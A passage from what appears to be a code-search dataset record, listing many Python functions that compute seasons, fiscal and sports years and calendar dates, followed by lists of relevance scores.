\"winter\"\n\n return season", "def calcSeasonModified( monthNum ):\r\n\r\n if monthNum == 12 or monthNum == 1 or monthNum == 2:\r\n return 0\r\n\r\n elif monthNum == 6 or monthNum == 7 or monthNum == 7:\r\n return 1\r\n\r\n else:\r\n return 3", "def seasonNumber(self):\n return self.index", "def seasonNumber(self):\n if self._seasonNumber is None:\n self._seasonNumber = self.parentIndex if isinstance(self.parentIndex, int) else self.season().seasonNumber\n return utils.cast(int, self._seasonNumber)", "def test_get_season_19_march(self, calendar, expected):\n date = datetime.date(2017, 3, 19)\n assert calendar.get_season(date) == expected", "def current_season_phase():\n _update_week_number()\n return _cur_season_phase", "def get_season_year(league_id):\n\n today = date.today()\n\n month = today.month\n year = today.year\n\n if league_id == \"10\":\n season_year = str(year)\n else:\n if month >= 10:\n # Defaulting to current season in October\n next_year = int(str(year)[-2:]) + 1\n season_year = str(year) + \"-\" + str(next_year)\n else:\n # Defaulting to the current or just completed season\n # from Jan. 
to Sept.\n next_year = int(str(year)[-2:])\n season_year = str(year - 1) + \"-\" + str(next_year)\n\n return season_year", "def get_season(\n current_date: date, hemisphere: str, season_tracking_type: str\n) -> str | None:\n\n if hemisphere == \"equator\":\n return None\n\n if season_tracking_type == TYPE_ASTRONOMICAL:\n spring_start = ephem.next_equinox(str(current_date.year)).datetime()\n summer_start = ephem.next_solstice(str(current_date.year)).datetime()\n autumn_start = ephem.next_equinox(spring_start).datetime()\n winter_start = ephem.next_solstice(summer_start).datetime()\n else:\n spring_start = datetime(2017, 3, 1).replace(year=current_date.year)\n summer_start = spring_start.replace(month=6)\n autumn_start = spring_start.replace(month=9)\n winter_start = spring_start.replace(month=12)\n\n if spring_start <= current_date < summer_start:\n season = STATE_SPRING\n elif summer_start <= current_date < autumn_start:\n season = STATE_SUMMER\n elif autumn_start <= current_date < winter_start:\n season = STATE_AUTUMN\n elif winter_start <= current_date or spring_start > current_date:\n season = STATE_WINTER\n\n # If user is located in the southern hemisphere swap the season\n if hemisphere == NORTHERN:\n return season\n return HEMISPHERE_SEASON_SWAP.get(season)", "def convert_season(row): \n if row[\"month\"] >= 8:\n return int(row[\"season\"][:4])\n else:\n return int(row[\"season\"][-4:])", "def get_current_hockey_year_start():\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_last_year()\n\n else: # if month >= 9 (Sept)\n return get_current_year()", "def season(self, seasonnum, order='aired'):\n if order=='aired':\n seasons = self.seasons\n elif order == 'dvd':\n seasons = self.dvd_seasons\n try:\n return seasons[seasonnum]\n except KeyError:\n raise SeasonNotFoundError(\n 'Season no %s does not exists' % seasonnum\n ), None, sys.exc_info()[2]", "def get_current_hockey_year():\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8: \n return get_last_year() + get_current_year()\n\n\n else: # if month >= 9 (Sept)\n return get_current_year() + get_next_year()", "def getseason(data):\n ## Season key is the most reliable\n season = data.get(\"season\")\n if season:\n ## Season key is an integer formatted \"YYS\" and is 2000-based (i.e.- 171 == 2017-Winter)\n season = str(season)\n year = int(f\"20{season[:2]}\")\n ## Anichart Season key is 1-indexed\n season = int(season[2]) - 1\n ## This should normally pass; if it consistently does not, we'll have to investigate why\n try: return SeasonCharts.buildseason(season,year)\n ## If something goes wrong, we'll try another method\n except: print(f\"Failed to parse season: {data['season']}\")\n ## Next, we'll iterate over rankings to try to determine the season/year\n ## There are multiple types of rankings based on season, year, and both combined,\n ## so we'll piece it together based on whatever we come across first\n season,year = None,None\n for ranking in data.get(\"rankings\",list()):\n ## Quicker exit (without just making this loop its own function)\n if season and year: continue\n ## We'll ignore stuff we've already gotten and assume that nothing in\n ## rankings contradicts eachother\n if not season:\n ## Defaults to None one way or another if it's not supplied\n season = ranking.get(\"season\")\n if not year: year = ranking.get(\"year\")\n ## Check if 
we made it\n if season and year:\n ## As above, this should always work out-of-the-box\n try: return SeasonCharts.buildseason(season,year)\n except: print(season,year)\n ## Welp, we're stumped...\n return None", "def get_season_dates(date, season):\n start_date_start = date\n start_date_end = date\n if season == \"Spring\":\n start_date_start = date.replace(month=4)\n start_date_end = date.replace(month=6, day=30)\n elif season == \"Summer\":\n start_date_start = date.replace(month=7)\n start_date_end = date.replace(month=9, day=30)\n elif season == \"Fall\":\n start_date_start = date.replace(month=10)\n start_date_end = date.replace(month=12, day=31)\n elif season == \"Winter\":\n start_date_start = date.replace(month=1)\n start_date_end = date.replace(month=3, day=31)\n return start_date_start, start_date_end", "def get_fiscal_year(self):\n next_calendar_year_months = [10, 11, 12]\n if self.start_date.month in next_calendar_year_months:\n fiscal_year = self.start_date.year + 1\n return fiscal_year\n else:\n return self.start_date.year", "def test_21st_century(self):\r\n season = \"2019-20\"\r\n res = get_end_year(season)\r\n assert res == 2020", "def get_mothers_day_date(year):\r\n start_date = parse(f\"Jan {year}\").date()\r\n for date in rrule(YEARLY, dtstart=start_date, bymonth=5, byweekday=SU, bysetpos=2):\r\n if date.year == year:\r\n return date.date()", "def get_season_no(token, url):\n headers = {'Accept': 'application/json', 'Authorization': token}\n r = requests.get(url, headers=headers)\n json_data = json.loads(r.text).get('data')\n high_season = 1\n for episode in json_data:\n if episode.get('airedSeason') > high_season:\n high_season = episode.get('airedSeason')\n return high_season", "def distributeSeason(self):\n i = 1\n for day in self.daylist:\n if i >= monthbeg[5] and i < monthbeg[9]: #june through SEpt as per SCE\n day.season = 'summer' #https://www.sce.com/residential/rates/Time-Of-Use-Residential-Rate-Plans\n i = i + 1\n else:\n day.season = 'winter'\n i = i+1", "def dia_revolucion(year):\n return nth_day_of_month(3, MON, NOV, year)", "def calcSeason(ra, time):\n # Reference RA and equinox to anchor ra/season reference - RA = 0 is overhead at autumnal equinox\n # autumn equinox 2014 happened on september 23 --> equinox MJD\n Equinox = 2456923.5 - 2400000.5\n # convert ra into 'days'\n dayRA = ra / 360 * 365.25\n firstSeasonBegan = Equinox + dayRA - 0.5 * 365.25\n seasons = (time - firstSeasonBegan) / 365.25\n # Set first season to 0\n seasons = seasons - np.floor(np.min(seasons))\n return seasons", "def test_20th_century(self):\r\n season = \"1989-90\"\r\n res = get_end_year(season)\r\n assert res == 1990", "def calendar_year(cls, tee):\n return iround(((tee - OldHindu.EPOCH) / cls.SIDEREAL_YEAR) - (cls.solar_longitude(tee) / 360))", "def calendar_year(cls, tee):\n return iround(((tee - OldHindu.EPOCH) / cls.MEAN_SIDEREAL_YEAR) - (sidereal_solar_longitude(tee) / 360))", "def get_current_fiscal_year(self):\n current_date = datetime.today().date()\n for year in self.fiscal_years.all():\n if year.begin_date < current_date < year.end_date:\n return year\n return None", "def get_next_hockey_year(year=None):\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_current_year() + get_next_year()\n\n else: # if month >= 9 (Sept)\n next_year = get_next_year()\n return next_year + get_next_year(year=next_year)", "def election_day(year):\n return nth_day_of_month(1, TUE, NOV, 
year)", "def test_year_2000(self):\r\n season = \"1999-00\"\r\n res = get_end_year(season)\r\n assert res == 2000", "def get_season_url(\n base_url: str, year: Optional[int] = None, season: Optional[str] = None\n) -> str:\n if year is None or season is None:\n return f\"{base_url}/season\"\n return f\"{base_url}/season/{year}/{season.lower()}\"", "def next(self):\n season = self.value\n season = (season + 1) % len(Season.__members__.items())\n return Season(season)", "def getCurrentYear(self):\n return math.ceil(self.wcount / 48)", "def getNumSeasons(self):\n searchURL = \"http://api.tvmaze.com/shows/\" + str(self.__showID) \\\n + \"/seasons\"\n\n response = requests.get(searchURL)\n data = response.json()\n\n return data[-1][\"number\"]", "def get_year(self) -> Optional[int]:\n return self.year", "def get_competition_season_type(season):\n default_type = games.models.CompetitionSeason.winter\n try:\n season_name = season.name\n if season_name.find(\"/\") == -1:\n return games.models.CompetitionSeason.summer\n return default_type\n except Exception as e:\n return default_type", "def set_season(self, season):\n self.set_date_range(dt.date(season, 1, 1),\n dt.date(season, 12, 31))", "def get_fiscal_year_start_month(self):\n return self.fiscal_year_start_month", "def get_months_to_date():\n month_sequence = [5, 4, 3, 2, 1, 12, 11, 10, 9, 8] # season is August to May\n try:\n current_month_index = month_sequence.index(dt.now().month)\n except ValueError:\n current_month_index = 0\n\n return month_sequence[current_month_index:]", "def year(self) -> int:\n if self.is_old_style:\n yy = int(self.split('/', 1)[1][0:2])\n else:\n yy = int(self[:2])\n if yy > 90:\n return 1900 + yy\n return 2000 + yy", "def year(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"year\")", "async def get_season(self, server: model.Server):\n api_url = ('https://eu.api.blizzard.com/sc2/'\n f'ladder/season/{server.id()}')\n payload = {'locale': 'en_US',\n 'access_token': await self.get_access_token()}\n data, status = await self._perform_api_request(api_url, params=payload)\n if status != 200:\n raise InvalidApiResponse(f'{status}: {api_url}')\n\n return model.Season(\n season_id=data.get('seasonId'),\n number=data.get('number'),\n year=data.get('year'),\n server=server,\n start=datetime.fromtimestamp(int(data.get('startDate'))),\n end=datetime.fromtimestamp(int(data.get('endDate')))\n )", "def Seasons(year):\n mar_equinox = _FindSeasonChange(0, year, 3, 19)\n jun_solstice = _FindSeasonChange(90, year, 6, 19)\n sep_equinox = _FindSeasonChange(180, year, 9, 21)\n dec_solstice = _FindSeasonChange(270, year, 12, 20)\n return SeasonInfo(mar_equinox, jun_solstice, sep_equinox, dec_solstice)", "def season_days(season, leap=False):\n\n # Index of first day of each month\n ndays = days_per_month(leap=leap)\n ndays.insert(0,1)\n days = np.cumsum(ndays)\n\n # Index of months for this season\n imon = season_months(season)\n\n # Days of the year for this season\n if isinstance(imon, list):\n # Iterate over months in this season\n idays=[]\n for m in imon:\n idays.extend(list(range(days[m-1], days[m])))\n else:\n # Single month\n idays = list(range(days[imon-1], days[imon]))\n\n return idays", "def set_season_time(season): \n if season == '2021-22':\n startdate = time.strptime('13-08-2021', '%d-%m-%Y')\n startdate = datetime.fromtimestamp(mktime(startdate))\n enddate = time.strptime('08-10-2021', '%d-%m-%Y')\n enddate = datetime.fromtimestamp(mktime(enddate))\n if season == '2020-21':\n startdate = 
time.strptime('12-08-2020', '%d-%m-%Y')\n startdate = datetime.fromtimestamp(mktime(startdate))\n enddate = time.strptime('26-07-2021', '%d-%m-%Y')\n enddate = datetime.fromtimestamp(mktime(enddate))\n if season == '2019-20':\n startdate = time.strptime('09-08-2019', '%d-%m-%Y')\n startdate = datetime.fromtimestamp(mktime(startdate))\n enddate = time.strptime('26-07-2020', '%d-%m-%Y')\n enddate = datetime.fromtimestamp(mktime(enddate))\n return startdate, enddate", "def seasonEpisode(self):\n return f's{str(self.seasonNumber).zfill(2)}e{str(self.episodeNumber).zfill(2)}'", "def get_pvp_season(self, region, namespace, season_id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/pvp-season/{0}', region, *[season_id], **filters)", "def get_today_year(self):\n\n today = date.today()\n iso_result = today.isocalendar()\n return iso_result[0]", "def season(obs, season_gap=80., mjdCol='observationStartMJD'):\n\n # check wether season has already been estimated\n if 'season' in obs.dtype.names:\n return obs\n\n obs.sort(order=mjdCol)\n\n \"\"\"\n if len(obs) == 1:\n obs = np.atleast_1d(obs)\n obs = rf.append_fields([obs], 'season', [1.])\n return obs\n diff = obs[mjdCol][1:]-obs[mjdCol][:-1]\n\n flag = np.argwhere(diff > season_gap)\n if len(flag) > 0:\n seas = np.zeros((len(obs),), dtype=int)\n flag += 1\n seas[0:flag[0][0]] = 1\n for iflag in range(len(flag)-1):\n seas[flag[iflag][0]:flag[iflag+1][0]] = iflag+2\n seas[flag[-1][0]:] = len(flag)+1\n obs = rf.append_fields(obs, 'season', seas)\n else:\n obs = rf.append_fields(obs, 'season', [1]*len(obs))\n \"\"\"\n seasoncalc = np.ones(obs.size, dtype=int)\n\n if len(obs) > 1:\n diff = np.diff(obs[mjdCol])\n flag = np.where(diff > season_gap)[0]\n\n if len(flag) > 0:\n for i, indx in enumerate(flag):\n seasoncalc[indx+1:] = i+2\n\n obs = rf.append_fields(obs, 'season', seasoncalc)\n return obs", "def twenty_seventeen():\n return 2017", "def set_season(date_obj):\n date_year = date_obj.year\n\n for key, val in SEASONS.items():\n start = datetime(year=date_year, month=val['start']['month'], day=val['start']['day'])\n end = datetime(year=date_year, month=val['end']['month'], day=val['end']['day'])\n if key == 'Winter':\n start_year = date_year - 1 if date_obj.month in [1, 2, 3] else date_year\n end_year = date_year + 1 if date_obj.month == 12 else date_year\n start = datetime(year=start_year, month=val['start']['month'], day=val['start']['day'])\n end = datetime(year=end_year, month=val['end']['month'], day=val['end']['day'])\n\n if start <= date_obj <= end:\n return key", "def get_year(self):\n\n # First we get the first 8 bits stored in the yqr register\n year_bcd = self.__read_register(_REGISTER_YEAR)\n\n # Then we extract the digits and the tens\n tens = (year_bcd & 0xF0) >> 4 # 0xF0 = 0b11110000\n digit = (year_bcd & 0x0F) # 0x0F = 0b00001111\n\n # We return year value shifted in range [1970..2129]\n return (10 * (tens) + digit) + 1970", "def get_year(self):\n return self.year", "def get_last_year(data_id):\n if data_id.startswith(\"cfsv2\"):\n return 2017\n return 2018", "def get_current_year() -> int:\n return datetime.now().year", "def seasons(self):\n if self._season_cache_ver == self._db._version:\n return self._season_cache\n\n # Find out how many seasons in this series by fetching the highest season.\n seasons = self._db.query(type='episode', parent=self._dbrow, attrs=['season'], distinct=True)\n self._season_cache = [Season(self._db, self, row['season']) for row in seasons]\n self._season_cache_ver = 
self._db._version\n return self._season_cache", "def parse_season(filename):\n print_info('Attempting to parse {0}'.format(filename))\n print_info('Extracting season from {0}'.format(filename))\n for regex in SEASON_REGEX:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_season = m.group('Season').lower()\n print_info('Extracted season: {0}'.format(extracted_season))\n\n season_num = int(extracted_season)\n if season_num is not None and season_num > 0:\n print_info('Season might be: {0}'.format(season_num))\n return 'S' + format_num(season_num)\n return 'S01'", "def get_year(self) -> str:\n return str(self.movie.releasedate.year)", "def season_folder(cls, season):\r\n\r\n\t\t'''# Google Drive downloads replace these characters automatically\r\n\t\t# I'm implementing this in the code as well for convenience\r\n\t\tseason = season.replace(\"&\", \"_\")\r\n\t\tseason = season.replace(\"'\", \"_\")'''\r\n\r\n\t\t# Folder names are ANSI versions of the season name\r\n\t\t# This is important in names like \"Lé Unicorn\" which get\r\n\t\t# converted incorrectly as folder names\r\n\t\tseason = season.encode(encoding=\"utf-8\")\r\n\t\tseason = season.decode(encoding=\"cp1252\", errors=\"ignore\")\r\n\r\n\t\treturn season", "def yy(self):\n return str(self._year)[-2:]", "def day_of_year(self):\n if self._day_of_year is None:\n cumul_days_in_month_nonleap = tf.math.cumsum(\n _DAYS_IN_MONTHS_NON_LEAP, exclusive=True)\n cumul_days_in_month_leap = tf.math.cumsum(\n _DAYS_IN_MONTHS_LEAP, exclusive=True)\n days_before_month_non_leap = tf.gather(cumul_days_in_month_nonleap,\n self.month() - 1)\n days_before_month_leap = tf.gather(cumul_days_in_month_leap,\n self.month() - 1)\n days_before_month = tf.where(\n date_utils.is_leap_year(self.year()), days_before_month_leap,\n days_before_month_non_leap)\n self._day_of_year = days_before_month + self.day()\n return self._day_of_year", "def getYear(self):\n return _libsbml.Date_getYear(self)", "def get_default():\n today = datetime.date.today()\n if today.month == 1:\n return YearMonth(today.year - 1, 12)\n return YearMonth(today.year, today.month - 1)", "def get_year_end(x: Optional[Date] = None) -> Date:\n return (x or get_today()).replace(month=12, day=31)", "def model_start_year(self):\n return self._model_start_year", "def year(self):\n\n properties_file = open(self.scenario_path + \"/conf/sandag_abm.properties\", \"r\")\n year = None\n\n for line in properties_file:\n # strip all white space from the line\n line = line.replace(\" \", \"\")\n\n # find line containing \"scenarioYear=\"\n m = re.compile(\"scenarioYear=\").match(line)\n if m:\n # take the portion of the line after the matching string\n # and return as the scenario year\n year = int(line[m.end():])\n break\n\n properties_file.close()\n\n return year", "def get_last_year(year=None):\n if year:\n return str(int(year)-1)\n else:\n return str(get_current_year(as_string=False) - 1)", "def timeave_seasonal( mv, seasons=seasonsyr ):\n return seasons.climatology(mv)", "def day_of_year(self):\n return int(self.date.strftime('%j'))", "def getIssnYear(artMeta):\n if artMeta == None:\n return\n else:\n issn = getIssn(artMeta)\n if issn == '':\n issn = artMeta['journal']\n if issn == '':\n return ('noJournal', artMeta['year'])\n issnYear = (issn, artMeta['year'])\n return issnYear", "def season_months(season):\n\n ssn=['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug',\n 'sep', 'oct', 'nov', 'dec', 'djf', 'mam', 'jja', 'son',\n 'mayjun', 'julaug', 'marapr', 'jjas', 'ond', 
'ann']\n\n imon = [1, 2, 3, 4, 5, 6, 7, 8,\n 9, 10, 11, 12, [1,2,12], [3,4,5], [6,7,8], [9,10,11],\n [5,6], [7,8], [3,4], [6,7,8,9], [10,11,12], list(range(1,13))]\n\n try:\n ifind = ssn.index(season.lower())\n except ValueError:\n raise ValueError('Season not found! Valid seasons: ' + ', '.join(ssn))\n\n months = imon[ifind]\n\n # Make sure the output is a list\n if isinstance(months, int):\n months =[months]\n\n return months", "def month(self) -> int:\n if self.is_old_style:\n return int(self.split('/', 1)[1][2:4])\n return int(self[2:4])", "def yearShown(self):\n return self.currentYear", "def model_end_year(self):\n return self._model_end_year", "def __get_step1_end_year(yaml_content: dict) -> str:\n\n end_year = None\n\n try:\n end_year = yaml_content['step1.end_year']\n except KeyError as exc:\n print(ConfigurationFactory.__get_key_missing_error_message(exc))\n\n return end_year", "def get_year(date):\n return date.strftime('%Y')", "def from_code(self, code):\n return next((season for season in self._seasons if season.season_code == code.lower()), None)", "def extract_season_episode_from_str(s):\n m = check_for_season_episode_code(s)\n\n if not m:\n return 1, 1\n\n return int(m.group(1)), int(m.group(2))", "def test_get_seasonal_statistics___season_to_date(self):\n msg = \"Response status is not 200\"\n response = self.api.get_seasonal_statistics___season_to_date(self.season, self.nhl_season, self.team_id)\n self.assertEqual(response.status_code, 200, msg)", "def get_number_year(text):\n val = get_number(text)\n if val is None or val < 1700 or val > (datetime.date.today().year + 1):\n return None\n return val", "def getWaterYear(date):\n\n year = date.year\n yearstring = \"{}/{}\"\n if date.month >= 10:\n return yearstring.format(year, year + 1)\n else:\n return yearstring.format(year - 1, year)", "def season(self, title=None, season=None):\n key = f'{self.key}/children?excludeAllLeaves=1'\n if title is not None and not isinstance(title, int):\n return self.fetchItem(key, Season, title__iexact=title)\n elif season is not None or isinstance(title, int):\n if isinstance(title, int):\n index = title\n else:\n index = season\n return self.fetchItem(key, Season, index=index)\n raise BadRequest('Missing argument: title or season is required')", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def get_prev_year_end(x: Optional[Date] = None, years: PositiveInteger = _POS_INT_1) -> Date:\n return Date((x or get_today()).year - years, 12, 31)", "def iso_year_start(self, iso_year):\n fourth_jan = datetime.date(iso_year, 1, 4)\n delta = datetime.timedelta(fourth_jan.isoweekday() - 1)\n return fourth_jan - delta", "def num_of_day(month, year):\n if month in _31_DAYS_MONTHS:\n return 31\n elif month in _30_DAYS_MONTHS:\n return 30\n elif month == 2:\n return 29 if year % 400 == 0 or (((year % 4) == 0) and ((year % 100) != 0)) else 28", "def get_player_season(self, season_id):\n return self._pubg.player_season(self.player_id, season_id, self.shard)", "def equinox(year, season):\r\n estimate = estimateEquinox(year, season) # Initial estimate of date of event\r\n t = (estimate - 2451545.0) / 36525\r\n w = 35999.373 * t - 2.47\r\n dL = 1 + 0.0334 * cosFromDeg(w) + 0.0007 * cosFromDeg(2 * w)\r\n 
s = periodic24(t)\r\n julianEmphemerisDays = estimate + ((0.00001 * s) / dL)\r\n tdt = fromJDtoUtc(julianEmphemerisDays)\r\n return fromTdTtoUtc(tdt)", "def DecYear( YR, MO, DY, HR, MN, SC):\r\n nDays = 365.25\r\n return YR + (MO-1)/12 + (DY-1)/nDays + HR/(nDays*24) + MN/(nDays*24*60) + SC/(nDays*24*3600)", "def get_pvp_season_index(self, region, namespace, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/pvp-season/index', region, **filters)", "def last_quarter(today):\n quarter_date = today - relativedelta(months=1)\n while quarter_date.month % 3 != 0:\n quarter_date = quarter_date - relativedelta(months=1)\n return quarter_date.year, int(quarter_date.month / 3)", "def yearfrac(self) -> float:\n return (self.last_idx - self.first_idx).days / 365.25", "def seasonality(df):\n df_datetime = pd.DatetimeIndex(df.date_time)\n df[\"month\"] = df_datetime.month\n df = drop_cols(df, [\"date_time\"])\n\n return df", "def get_seasons_information():\n\n #getting the guidebox_id variable from show_page.html\n guidebox_id = request.args.get(\"guidebox_id\")\n\n #make API to get season information, gets back list of season information\n seasons_results = guidebox_season_info(guidebox_id)\n\n for season in seasons_results:\n date = season[\"first_airdate\"]\n year = str(date)[0:4]\n season[\"first_airdate\"] = year\n\n return jsonify(seasons_results)", "def closeyear(year):\n\n # Return the specific year\n return int(year % 4)", "def to_fixed(self):\n begin = ifloor((self.year + self.SOLAR_ERA + ((self.month - 1)/12)) * self.SIDEREAL_YEAR + OldHindu.EPOCH)\n return self.day - 1 + next_int(begin - 3, lambda d: self.zodiac(self.sunrise(d + 1)) == self.month)" ]
[ "0.81641465", "0.7565352", "0.74286443", "0.6773904", "0.66487664", "0.6576127", "0.65571433", "0.6517643", "0.6495419", "0.64488924", "0.64429444", "0.64425147", "0.64404756", "0.6364527", "0.62375706", "0.61532784", "0.61332804", "0.6104992", "0.5971628", "0.5910558", "0.5863225", "0.582131", "0.57585377", "0.57450205", "0.5730995", "0.5719832", "0.5665247", "0.56471336", "0.5624144", "0.56237185", "0.5604175", "0.55866754", "0.55809045", "0.5570084", "0.55387765", "0.55318046", "0.5506367", "0.5503711", "0.54854596", "0.5478793", "0.54778475", "0.5464001", "0.54059213", "0.54020613", "0.53774446", "0.537477", "0.53747654", "0.5362659", "0.5354819", "0.5348997", "0.5324601", "0.5316898", "0.53057176", "0.5287074", "0.52844775", "0.52724516", "0.52705586", "0.52619153", "0.5248508", "0.5246867", "0.52272725", "0.5222711", "0.52172285", "0.5206942", "0.52030253", "0.5201963", "0.52009916", "0.51864576", "0.51531255", "0.5134457", "0.5127182", "0.5111676", "0.51053804", "0.5104991", "0.50999856", "0.509652", "0.5087805", "0.5084714", "0.5075693", "0.50750256", "0.5070052", "0.5062363", "0.50472283", "0.5045036", "0.50350493", "0.5032463", "0.50218695", "0.5017402", "0.50136375", "0.50116795", "0.50086594", "0.499824", "0.49960035", "0.49765474", "0.49737987", "0.49736923", "0.49676958", "0.49659175", "0.4960364", "0.49533868" ]
0.8059089
1
Returns first Monday in September of given year
def _labor_day(year):
    day = datetime(year, 9, 1)
    delta = timedelta(days=1)
    while day.weekday() != 0:
        day += delta
    return day
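
A short usage sketch (the function requires datetime and timedelta imported from the datetime module; the printed values follow from the 2023 and 2024 calendars):

    print(_labor_day(2023))  # 2023-09-04 00:00:00 (Labor Day 2023)
    print(_labor_day(2024))  # 2024-09-02 00:00:00
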
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wkday_on_first(yr, mon): # returns day of week of first of month of the given year (1/1/2016)\r\n TotalDays = 0\r\n for x in range(1754, yr):\r\n YearNum = yeardays(x)\r\n TotalDays += YearNum\r\n for x in range(1, mon):\r\n MonNum = monthdays(yr, x)\r\n TotalDays += MonNum\r\n WhatDayNum = TotalDays % 7\r\n WhatDay = [\"Tues\", \"Wedn\", \"Thu\", \"Fri\", \"Sat\", \"Mon\"]\r\n return WhatDay[WhatDayNum]", "def first_monday_of_week(year, week):\n weekyear = \"{} {} 1\".format(year, week)\n return time.asctime(time.strptime(weekyear, \"%Y %U %w\"))", "def first_day_of_year(year):\n year -= 1\n return (year + (year // 4) - (year // 100) + (year // 400) + 1) % NUM_DAYS_IN_WEEK", "def week_start_on_monday(weekday):\n return (weekday - 1 + 6) % 7 + 1", "def get_mothers_day_date(year):\r\n start_date = parse(f\"Jan {year}\").date()\r\n for date in rrule(YEARLY, dtstart=start_date, bymonth=5, byweekday=SU, bysetpos=2):\r\n if date.year == year:\r\n return date.date()", "def MayDay(year):\n\n day = datetime.date(year, 5, 1)\n count = 0\n while True:\n if day.weekday() == 0:\n count += 1\n if count == 1:\n return day\n day += datetime.timedelta(days=1)", "def get_next_monday(date):\n return date + datetime.timedelta(days=-date.weekday(), weeks=1)", "def get_mothers_day_date(year):\n day = date(year=year, month=5, day=1)\n while 1:\n if day.weekday() == 6:\n day += timedelta(days=7)\n break\n day += timedelta(days=1)\n return day", "def DayOfWeek(year, month, day):\n num = year * 365\n num = num + year // 4 + 1\n num = num - (year // 100 + 1)\n num = num + year // 400 + 1\n if month < 3 and LeapYear(year):\n num = num - 1\n return (num + MONTH_OFFSETS[month - 1] + day + 4) % 7 + 1", "def _get_next_monday(self):\n today = datetime.date.today()\n weekday_int = today.weekday()\n if weekday_int == 0:\n return today\n next_mon = today + timedelta(7 - weekday_int)\n return next_mon", "def day_of_week(day, month, year):\n bias = (14 - month) // 12\n m_year = year - bias\n mth = month + 12 * bias - 2\n return (day + m_year + m_year // 4 - m_year // 100 + m_year // 400 + (31 * mth) // 12) % 7", "def GetFirstSundayOfMonth(year, month):\n weeks = calendar.Calendar().monthdays2calendar(year, month)\n # Return the first day in the first week that is a Sunday.\n return [date_day[0] for date_day in weeks[0] if date_day[1] == 6][0]", "def date_week_of_year(date, *, sunday_is_first_day_of_week: bool = False):\n if sunday_is_first_day_of_week:\n return date.strftime(\"%U\")\n else:\n return date.strftime(\"%V\")", "def Day_of_week(day, month, year):\r\n if year % 4 == 0 and (year % 400 == 0 or year % 100 != 0):\r\n doomsday = [11, 29, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n else:\r\n doomsday = [10, 28, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n exact_day = ((day - doomsday[month-1]) + Dooms_day(year)) % 7\r\n character_day = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \r\n \"Friday\", \"Saturday\"]\r\n return character_day[exact_day]", "def get_week(date):\n\n # TODO: the API seems broken. 
It returns week, year not year, week as documented\n # why not use date.isocalendar() from the stdlib?\n\n date = date_trunc('week', date)\n\n first_monday = date_trunc('week', date_trunc('year', date))\n if first_monday.year < date.year:\n first_monday += datetime.timedelta(weeks=1)\n diff = date_trunc('day', date) - first_monday\n week = 1 + (diff.days / 7)\n return week, first_monday.year", "def first_day_of_month(date):\n return date.replace(day=1)", "def first_day_of_month(date):\n return date.replace(day=1)", "def week_of_month(dt):\n\n first_day = dt.replace(day=1)\n\n dom = dt.day\n adjusted_dom = dom + first_day.weekday()\n\n return int(ceil(adjusted_dom/7.0))", "def first_month_day():\r\n return datetime.now().replace(day=1).strftime('%d-%m-%Y')", "def start_month(d):\n return date(d.year, d.month, 1)", "def iso_year_start(self, iso_year):\n fourth_jan = datetime.date(iso_year, 1, 4)\n delta = datetime.timedelta(fourth_jan.isoweekday() - 1)\n return fourth_jan - delta", "def get_start_date(year, month):\n start_date = date(year, month, 1).strftime(\"%Y-%m-%d\")\n return start_date", "def dayofweek(day, month, year, formatresult=True):\n if formatresult is False:\n return calendar.weekday(year, month, day) + 1\n days = {\n 0: 'Monday',\n 1: \"Tuesday\",\n 2: \"Wednesday\",\n 3: \"Thursday\",\n 4: \"Friday\",\n 5: \"Saturday\",\n 6: \"Sunday\"\n }\n return days[calendar.weekday(year, month, day)]", "def Dooms_day(year):\r\n day = (year % 100 + (year % 100)//4 + Anchor_day(year)) % 7\r\n return day", "def locale_first_weekday():\n\tfirst_weekday = 6 #by default settle on monday\n\n\ttry:\n\t\tprocess = os.popen(\"locale first_weekday week-1stday\")\n\t\tweek_offset, week_start = process.read().split('\\n')[:2]\n\t\tprocess.close()\n\t\tweek_start = datetime.date(*time.strptime(week_start, \"%Y%m%d\")[:3])\n\t\tweek_offset = datetime.timedelta(int(week_offset) - 1)\n\t\tbeginning = week_start + week_offset\n\t\tfirst_weekday = int(beginning.strftime(\"%w\"))\n\texcept:\n\t\tprint \"WARNING - Failed to get first weekday from locale\"\n\n\treturn first_weekday", "def convert_week_number_to_date(week_number, first_monday, weekday=0):\n assert(1 <= week_number <= 52)\n assert(0 <= weekday <= 6)\n first_gehol_year_day = datetime.strptime(first_monday, \"%d/%m/%Y\")\n num_days = (week_number-1) * 7 + weekday\n dt = timedelta(days = num_days)\n return first_gehol_year_day + dt", "def date_to_day_of_week(year, month, day):\n # Calculate the day offset from Jan, 1 in the specified year.\n day_num = date_to_day_of_year(year, month, day)\n\n is_pre_2k = year < 2000\n if is_pre_2k:\n # Calculate the number of days from the end of the year.\n num_days = days_in_year(year) - day_num + 1\n start, step = 1999, -1\n else:\n # Calculate the number of days from the beginning of the year.\n num_days = day_num - 1\n start, step = 2000, 1\n\n for _year in range(start, year, step):\n num_days += days_in_year(_year)\n\n # Add the number of days to the day number for Jan 1, 2000 modulus 7\n # to get the current day number.\n if is_pre_2k:\n num_days = -num_days\n\n return (JAN_1_2000_DAY_NUM + num_days) % 7", "def find_date(startdate, weekday, weeknumber):\n import datetime\n # The +1 makes this match up with linux times (day 1 = Monday)\n daysahead = weekday - (startdate.weekday() + 1)\n if daysahead < 0:\n # Target day already happened this week\n daysahead += 7\n # Add 7 days for each Week Of Month we want - but 'This' week is week 1\n daysahead += 7 * (weeknumber - 1)\n return startdate + 
